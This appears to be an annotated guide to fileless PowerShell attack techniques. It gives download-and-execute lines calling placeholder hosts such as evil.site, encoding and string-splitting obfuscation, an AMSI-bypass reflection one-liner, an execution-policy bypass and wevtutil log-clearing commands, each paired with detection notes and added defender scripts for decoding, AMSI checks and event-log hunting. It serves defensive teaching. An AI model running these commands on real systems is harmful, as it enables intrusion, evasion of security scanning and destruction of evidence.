1. Fileless?
- Fileless attacks are malicious scripts or commands that never touch disk as a separate file.
- They exist only in memory, which makes them harder to catch with file-scanning antivirus or endpoint tools that key on dropped executables.
- PowerShell suits fileless execution well: it can fetch a script into a string and run that string without ever writing it out.
- Caveat: "fileless" does not mean invisible. Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational), Module Logging and AMSI all see the script content in memory, and process creation auditing (Security 4688, Sysmon Event ID 1) still records the powershell.exe command line.
2. Download & Execute Code From the Internet
IEX (New-Object Net.WebClient).DownloadString('http://evil.site/payload.ps1')
- DownloadString fetches the remote script into a .NET string; IEX (the alias of Invoke-Expression) parses and runs that string in the current session, so the payload never exists as a file.
- Invoke-WebRequest / Invoke-RestMethod piped into IEX achieve the same; a web fetch combined with Invoke-Expression is the pattern defenders hunt for.
3. Obfuscation Techniques (Avoiding Detection)
1) Base64 Encoding (used with -EncodedCommand)
powershell.exe -EncodedCommand aQBlAHgAIAAoAC...
- -EncodedCommand takes the Base64 of the UTF-16LE bytes of the script, not of its UTF-8 or ASCII bytes; that is why the blob above starts with aQBlAHgA, which is "iex " in UTF-16LE. The argument can be abbreviated (-enc, -ec, -e).
- Encoding hides nothing from anyone who decodes it; it only defeats naive string matching on the command line.
2) String Splitting / Concatenation
$part1 = "IEX"
$part2 = " (New-Object Net.WebClient).DownloadString('http://evil.com/s.ps1')"
Invoke-Expression ($part1 + $part2)
3) Aliases and Reversing
- Instead of writing Invoke-Expression, attackers use the IEX alias, backtick escapes inside the command name, or a name rebuilt at runtime:
I`eX
or
&([string]::Join('',('Invo','ke-Exp','ression')))
- The backtick is PowerShell's escape character; escaping an ordinary letter yields that letter, so I`eX is parsed as IeX. Letters that form real escape sequences (`n, `t, `0, and `e / `u in PowerShell 7) cannot be used this way.
- & followed by a string calls the command that string names, so the joined 'Invoke-Expression' runs although that token never appears in the script text.
- The goal is to bypass signature-based detection of the static script text. It does not defeat Script Block Logging or AMSI, which see each script block as PowerShell actually executes it: the de-obfuscated content handed to Invoke-Expression is itself a new script block and gets logged and scanned again.
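The following PowerShell is an added example, not code from the original page: it shows how an -EncodedCommand blob is built (UTF-16LE, as described in 3.1) and how a defender decodes one from a process command line and flags the download-and-execute pattern from section 2. The sample command line, the evil.site URL and the indicator list are constructed for the demo.

```powershell
# Added example (not from the original page): build, decode and triage -EncodedCommand payloads.
# Assumptions: the sample command line and the evil.site URL below are constructed for this demo.

# -EncodedCommand takes Base64 of the UTF-16LE ("Unicode") bytes of the script, not UTF-8.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Triage a process command line (Sysmon Event ID 1 / Security 4688 CommandLine):
# pull out the encoded argument, decode it and flag download-and-execute indicators.
function Test-EncodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts -EncodedCommand and unambiguous prefixes such as -enc, -ec and -e.
    $pattern = '(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)'
    if (-not ($CommandLine -match $pattern)) { return $null }
    $blob = $Matches[1]

    try { $decoded = ConvertFrom-EncodedCommand $blob }
    catch { return [pscustomobject]@{ Decoded = $null; Indicators = @('invalid-base64'); Suspicious = $true } }

    # Signature-style indicators applied to the decoded text; the blob itself is opaque.
    $indicatorPatterns = @(
        'Invoke-Expression', '\biex\b', 'DownloadString', 'DownloadFile',
        'Net\.WebClient', 'Invoke-WebRequest', 'FromBase64String', '-nop\b', '-w(indowstyle)?\s+hidden'
    )
    $hits = @(foreach ($p in $indicatorPatterns) { if ($decoded -match "(?i)$p") { $p } })
    [pscustomobject]@{
        Decoded    = $decoded
        Indicators = $hits
        Suspicious = ($hits.Count -gt 0)
    }
}

# --- Demo on a constructed sample ------------------------------------------------
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://evil.site/payload.ps1')"
$blob    = ConvertTo-EncodedCommand $payload
# 'IEX ' encodes to UTF-16LE bytes 49 00 45 00 58 00 20 00, so the blob starts with 'SQBFAFgA'.
$sampleCommandLine = "powershell.exe -NoP -W Hidden -enc $blob"   # constructed, not a real log line

Test-EncodedCommandLine $sampleCommandLine | Format-List

# A blob made from UTF-8 bytes decodes to garbage when read as UTF-16LE, which is why a
# decoder that assumes the wrong encoding (in either direction) misses the payload.
$wrong = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($payload))
ConvertFrom-EncodedCommand $wrong
```

Run it as a script; the first output shows the decoded payload with Invoke-Expression, iex, DownloadString and Net.WebClient flagged, the second shows the mangled text produced by the wrong encoding.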
4. Bypass Defender (ExecutionPolicy + AMSI)
1) Execution Policy Bypass (simple)
powershell -ExecutionPolicy Bypass -File evil.ps1
- Execution policy is a safety feature against accidentally running scripts, not a security boundary (Microsoft documents it as such). Any user can override it for a single process with -ExecutionPolicy Bypass, with -EncodedCommand, or by piping the script text into powershell.exe. Defender is not involved here, and the command line is still logged.
2) AMSI Bypass (advanced)
- AMSI = Antimalware Scan Interface. PowerShell hands every script block (including what Invoke-Expression and -EncodedCommand produce) to the registered antivirus engine before running it, so the engine sees de-obfuscated content in memory.
- Attackers use the following to disable it for the rest of the current process. It uses reflection to set the private static field amsiInitFailed of System.Management.Automation.AmsiUtils to $true; PowerShell then behaves as if AMSI initialization had failed and skips scanning.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
- Keep it on one line, or continue lines with a trailing backtick; PowerShell does not treat "\" as a line continuation.
- This exact string has been signatured for years and AMSI itself blocks it with Defender active, so in the wild it appears only obfuscated (string splitting, -replace, encoding). Script Block Logging still records the block, and the bypass affects only the process it runs in.
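The following PowerShell is an added example, not code from the original page: it gives a defender three checks around the bypass above, reading the amsiInitFailed flag in the current process, probing whether AMSI scanning is live using Microsoft's AMSI test string (the AMSI analogue of EICAR), and hunting 4104 script block events for the AmsiUtils reflection strings. The function names and the search terms are my own choices; running Test-AmsiScanning will show up as a detection in Defender's history, which is the point.

```powershell
# Added example (not from the original page): checks a defender can run around the AMSI bypass.
# Function names and search terms are assumptions chosen for this demo.

# 1) Has the well-known flag been flipped in this process? $true means the bypass ran here.
function Test-AmsiInitFailedFlag {
    $t = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
    if (-not $t) { return $null }                       # type missing or renamed in this build
    $f = $t.GetField('amsiInitFailed', 'NonPublic,Static')
    if (-not $f) { return $null }                       # field missing or renamed in this build
    [bool]$f.GetValue($null)
}

# 2) Is scanning live? Any AMSI provider flags the Microsoft AMSI test string, so evaluating
#    it is blocked with a ScriptContainedMaliciousContent parse error when AMSI works.
function Test-AmsiScanning {
    $testString = 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
    try {
        Invoke-Expression "'$testString'" | Out-Null
        return $false            # evaluated unopposed: no provider registered, or bypassed
    } catch {
        if ($_.FullyQualifiedErrorId -match 'MaliciousContent' -or
            $_.Exception.Message -match 'malicious content') {
            return $true         # blocked: AMSI is active in this process
        }
        throw                    # some other failure; do not mask it
    }
}

# 3) Hunt Script Block Logging for the reflection strings from the bypass. PowerShell 5+ also
#    auto-logs blocks that hit its built-in suspicious-term list as Warning-level 4104 events,
#    even where Script Block Logging has not been enabled by policy.
function Find-AmsiTamperingScriptBlocks {
    param([int]$Days = 7)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsiContext' } |
        Select-Object TimeCreated,
                      @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }   # property 2 = ScriptBlockText
}

# --- Demo -------------------------------------------------------------------------
"amsiInitFailed flag set : $(Test-AmsiInitFailedFlag)"
"AMSI scanning active    : $(Test-AmsiScanning)"
Find-AmsiTamperingScriptBlocks -Days 7 | Format-Table -AutoSize -Wrap
```

On a host with Defender running and no bypass, the first line prints False and the second True; after the one-liner above has run in the same session, both flip, while the 4104 hunt (run from any session) still shows the block that did it.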
5. Anti-Forensics: Clear Logs after Attack
wevtutil cl System
wevtutil cl Security
wevtutil cl "Windows PowerShell"
- Requires local administrator rights (always for Security, by default for the others).
- Clearing is itself loud: Event ID 1102 ("The audit log was cleared") is written to Security, and Event ID 104 to System for any other log, each naming the account that did it. SIEM rules treat both as high-fidelity alerts, and events already forwarded (Windows Event Forwarding, agent-based collection) survive the wipe.
- "Windows PowerShell" is the classic log; the Script Block Logging entries (4104) live in Microsoft-Windows-PowerShell/Operational, which this list does not touch.
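The following PowerShell is an added example, not code from the original page: it collects the traces that clearing a log leaves behind (1102 in Security, 104 in System) and reports the record counts of the two PowerShell logs so the analyst can see which one survived. The function names and the property offsets used to pull the account out of the events are my own; the offsets follow the field order in the events' XML and fall back to the message text if they do not line up.

```powershell
# Added example (not from the original page): find the evidence that a log was cleared.
# Function names and the Properties[] offsets below are assumptions based on the events' XML layout.

function Get-LogClearEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $queries = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since }   # Security log cleared
        @{ LogName = 'System';   Id = 104;  StartTime = $since }   # any other log cleared
    )
    foreach ($q in $queries) {
        # Reading Security needs admin; -ErrorAction hides the "No events were found" error.
        Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue | ForEach-Object {
            $p = $_.Properties
            if ($_.Id -eq 1102) {
                # 1102: SubjectUserSid, SubjectUserName, SubjectDomainName, SubjectLogonId
                $account = "$($p[2].Value)\$($p[1].Value)"; $cleared = 'Security'
            } else {
                # 104: SubjectUserName, SubjectDomainName, Channel, BackupPath
                $account = "$($p[1].Value)\$($p[0].Value)"; $cleared = $p[2].Value
            }
            if ($account -eq '\') { $account = ($_.Message -split "`r?`n")[0] }   # fallback to text
            [pscustomobject]@{
                Time       = $_.TimeCreated
                EventId    = $_.Id
                ClearedLog = $cleared
                Account    = $account
            }
        }
    }
}

# Which PowerShell logs still hold records? The classic "Windows PowerShell" log is on the
# attacker's list above; the Operational log with the 4104 script block events is not.
function Get-PowerShellLogRecordCounts {
    foreach ($name in 'Windows PowerShell', 'Microsoft-Windows-PowerShell/Operational') {
        $log = Get-WinEvent -ListLog $name -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Log         = $name
            RecordCount = if ($log) { $log.RecordCount } else { 'not present' }
        }
    }
}

# --- Demo -------------------------------------------------------------------------
Get-LogClearEvents -Hours 24 | Format-Table -AutoSize
Get-PowerShellLogRecordCounts | Format-Table -AutoSize
```

Run from an elevated session right after the three wevtutil commands above and the first table shows one 1102 and two 104 events for the same account, while the second table shows the Operational log's record count untouched.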